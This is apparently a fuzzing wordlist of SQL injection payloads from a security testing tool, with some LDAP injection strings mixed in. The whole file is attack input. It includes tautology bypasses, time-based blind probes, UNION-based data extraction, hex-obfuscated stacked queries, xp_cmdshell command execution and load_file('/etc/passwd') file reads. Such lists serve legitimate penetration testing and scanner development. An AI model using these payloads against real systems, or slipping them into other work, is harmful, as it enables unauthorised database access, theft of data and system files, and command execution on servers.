wordlists/wordlists/vulnerabilities/sql.txt

0
0 or 1=1
0x730065006c0065006300740020004000400076006500 ...
0x77616974666F722064656C61792027303A303A313027 ...
0x770061006900740066006F0072002000640065006C00 ...
1 or 1=1
1 or benchmark(10000000,MD5(1))#
1 or pg_sleep(__TIME__)--
1 or sleep(__TIME__)#
1 waitfor delay '0:0:10'--
1)) or benchmark(10000000,MD5(1))#
1)) or pg_sleep(__TIME__)--
1)) or sleep(__TIME__)#
1) or benchmark(10000000,MD5(1))#
1) or pg_sleep(__TIME__)--
1) or sleep(__TIME__)#
1;(load_file(char(47,101,116,99,47,112,97,115, ...
1;SELECT%20*
3.10E+17
21 %
23 OR 1=1
26 %
28 %
29 %
!
"));waitfor delay '0:0:__TIME__'--
")) or benchmark(10000000,MD5(1))#
")) or pg_sleep(__TIME__)--
")) or sleep(__TIME__)="
");waitfor delay '0:0:__TIME__'--
") or benchmark(10000000,MD5(1))#
") or pg_sleep(__TIME__)--
") or sleep(__TIME__)="
";waitfor delay '0:0:__TIME__'--
"a"" or 1=1--"
"a"" or 3=3--"
"hi"") or (""a""=""a"
" or 0=0 --
" or 1=1--
" or "a"="a
" or benchmark(10000000,MD5(1))#
" or isNULL(1/0) /*
" or pg_sleep(__TIME__)--
" or sleep(__TIME__)#
# from wapiti
%2A%7C
%2A%28%7C%28mail%3D%2A%29%29
%2A%28%7C%28objectclass%3D%2A%29%29
%7C
%20$(sleep%2050)
%20'sleep%2050'
%20or%20''='
%20or%20'x'='x
%20or%20x=x
%20or%201=1
%21
%26
%27%20or%201=1
%28
%29
%C0%80%27%C0%80%C0%80%C0%80O%C0%82R%C0%80%C0%801%C0%80%C0%A11
&
'%20OR
'
'%20or%20''='
'%20or%20'x'='x
'%20or%201=1
' (select top 1
')%20or%20('x'='x
') or ('a'='a
'; exec master..xp_cmdshell
'; exec master..xp_cmdshell 'ping 172.10.1.255'--
'; exec xp_regread
' UNION ALL SELECT
' UNION SELECT
'hi' or 'x'='x';
' or 0=0 #
' or 0=0 --
' or 1 --'
' or 1=1
' or 1=1 or ''='
' or 1=1--
' or 3=3
' or '1'='1'--
' or ''='
' or (EXISTS)
' or a=a--
' or uid like '%
' or uname like '%
' or userid like '%
' or user like '%
' or username like '%
'sqlattempt1
'||UTL_HTTP.REQUEST
(
 (select top 1
(sqlattempt2)
(sqlvuln)
(||6)
)
)%20or%20('x'='x
));waitfor delay '0:0:__TIME__'--
)) or benchmark(10000000,MD5(1))#
)) or pg_sleep(__TIME__)--
)) or sleep(__TIME__)='
);waitfor delay '0:0:__TIME__'--
) or ('a'='a
) or (a=a
) or benchmark(10000000,MD5(1))#
) or pg_sleep(__TIME__)--
) or sleep(__TIME__)='
) union select * from information_schema.tables;
*(|(mail=*))
*(|(objectclass=*))
*/*
*|
+sqlvuln
,@variable
 --
 -- &password=
--sp_password
/
/**/or/**/1/**/=/**/1
//
//*
; begin declare @var varchar(8000) set @var=' ...
; exec ('sel' + 'ect us' + 'er')
; exec master..xp_cmdshell
; exec master..xp_cmdshell 'ping 172.10.1.255'--
; execute immediate 'sel' || 'ect us' || 'er'
; exec xp_regread
; or '1'='1'
;waitfor delay '0:0:__TIME__'--
<>"'%;)(&+
?
@variable
@var select @var as var into temp end --
PRINT
PRINT @@variable
 UNION ALL SELECT
 UNION SELECT
\x27UNION SELECT
a'
a' or 1=1--
a' or 3=3--
a' or 'a' = 'a
a' waitfor delay '0:0:10'--
admin' or '
 and 1 in (select var from temp)--
 and 1=( if((load_file(char(110,46,101,120,11 ...
anything' OR 'x'='x
as
asc
benchmark(10000000,MD5(1))#
bfilename
char%4039%41%2b%40SELECT
declare @q nvarchar (200) 0x730065006c00650063 ...
declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
declare @q nvarchar (200) select @q = 0x770061 ...
declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
declare @q nvarchar (4000) select @q =
declare @s varchar(22) select @s =
declare @s varchar (200) select @s = 0x73656c6 ...
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
declare @s varchar(200) select @s = 0x77616974 ...
declare @s varchar(200) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)
declare @s varchar (8000) select @s = 0x73656c ...
delete
desc
distinct
exec(@s)
exec sp
exec xp
 group by userid having 1=1--
handler
having
 having 1=1--
hi') or ('a'='a
hi' or 1=1 --
hi' or 'a'='a
hi' or 'x'='x';
hi or 1=1 --"
hi or a=a
insert
like
limit
or
or 0=0 #
 or 0=0 #
or 0=0 #"
 or 0=0 #"
or 0=0 --
 or 0=0 --
 or 1 --'
 or 1 in (select @@version)--
 or 1/*
or 1=1
 or 1=1
 or 1=1 --
 or 1=1 /*
or 1=1 or ""=
 or 1=1 or ""=
 or 1=1 or ''='
or 1=1--
 or 1=1--
 or 2 > 1
 or 2 between 1 and 3
 or 3=3
 or 3=3 --
or%201=1
or%201=1 --
 or '1'='1
 or '1'='1'--
 or '7659'='7659
 or ''='
 or 'a'='a
 or 'something' = 'some'+'thing'
 or 'text' = n'text'
 or 'text' > 't'
 or 'unusual' = 'unusual'
 or 'whatever' in ('whatever')
 or (EXISTS)
or a=a
 or a=a
or a = a
 or a=a--
 or a = a
 or benchmark(10000000,MD5(1))#
order by
or isNULL(1/0) /*
 or pg_sleep(__TIME__)--
 or sleep(__TIME__)#
 or sleep(__TIME__)='
 or username like char(37);
password:*/=1--
pg_sleep(__TIME__)--
procedure
replace
select
 select * from information_schema.tables--
 select name from syscolumns where id = (sele ...
sqlvuln
sqlvuln;
t'exec master..xp_cmdshell 'nslookup www.googl ...
t'exec master..xp_cmdshell 'nslookup www.google.com'--
to_timestamp_tz
truncate
tz_offset
uni/**/on sel/**/ect
 union all select @@version--
 union select
 union select 1,load_file('/etc/passwd'),1,1,1;
 union select * from users where login = char ...
update
x' AND 1=(SELECT COUNT(*) FROM tabname); --
x' AND email IS NULL; --
x' AND members.email IS NULL; --
x' AND userid IS NULL; --
x' OR full_name LIKE '%Bob%
x' or 1=1 or 'x'='y
|
||6
||'6
||(elt(-3+5,bin(15),ord(10),hex(char(45))))
||UTL_HTTP.REQUEST
ý or 1=1 --
‘ or 1=1 --
‘ or 3=3 --